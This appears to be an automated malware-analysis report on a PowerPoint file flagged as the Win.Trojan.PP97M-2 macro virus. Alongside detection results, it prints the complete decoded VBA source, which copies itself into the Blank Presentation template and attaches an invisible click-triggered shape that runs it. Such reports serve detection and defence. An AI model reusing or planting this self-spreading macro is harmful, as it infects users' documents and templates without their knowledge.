MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature Win.Trojan.PP97M-2. The VBA macro attempts to achieve persistence by copying itself to the 'Blank Presentation.pot' template, potentially allowing it to run automatically when PowerPoint is opened. This persistence mechanism is a common tactic for malware.
Heuristics 2
-
ClamAV: Win.Trojan.PP97M-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.PP97M-2
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1772 bytes |
SHA-256: d2350e438f66e268c9f5415bf8ea41e6e9bd4bccbadcbea1471af53dd5acb7d3 |
|||
|
Detection
ClamAV:
Win.Trojan.PP97M-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ShapeMaster"
'<!--1nternal-->
'PPT.ShapeMaster v0.1 /1nternal
Sub actionhook(ShapeMaster)
On Error Resume Next
If Int(Rnd * 7) = 0 Then
Set Home = ActivePresentation
Prev = 1
Do
Last = Prev
Prev = InStr(Last + 1, Application.Path, "\")
Loop While Prev <> 0
Set templa = Presentations.Open(Left(Application.Path, Last) + "Templates\Blank Presentation.pot", , , msoFalse)
dontadd = False
For Each ModComponent In templa.VBProject.VBComponents
If ModComponent.Name = "ShapeMaster" Then dontadd = True
Next
If dontadd <> True Then
Set NewMod = templa.VBProject.VBComponents.Add(1)
NewMod.Name = "ShapeMaster"
NewMod.CodeModule.InsertLines 1, Home.VBProject.VBComponents("ShapeMaster").CodeModule.Lines(1, Home.VBProject.VBComponents("ShapeMaster").CodeModule.CountOfLines)
Set ShapetoWack = templa.SlideMaster.Shapes.AddShape(1, 0, 0, templa.PageSetup.SlideWidth, templa.PageSetup.SlideHeight)
With ShapetoWack
.Name = "ShapeMaster"
.ZOrder (msoSendToBack)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(ppMouseClick).Action = ppActionRunMacro
.ActionSettings(ppMouseClick).Run = "actionhook"
End With
templa.Save
End If
templa.Close
End If
If Int(Rnd * 10) = 0 Then
ActivePresentation.SlideShowWindow.View.Previous
If Int(Rnd * 5) = 0 Then MsgBox ("PPT.ShapeMaster v0.1 /1nternal")
Else
ActivePresentation.SlideShowWindow.View.Next
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.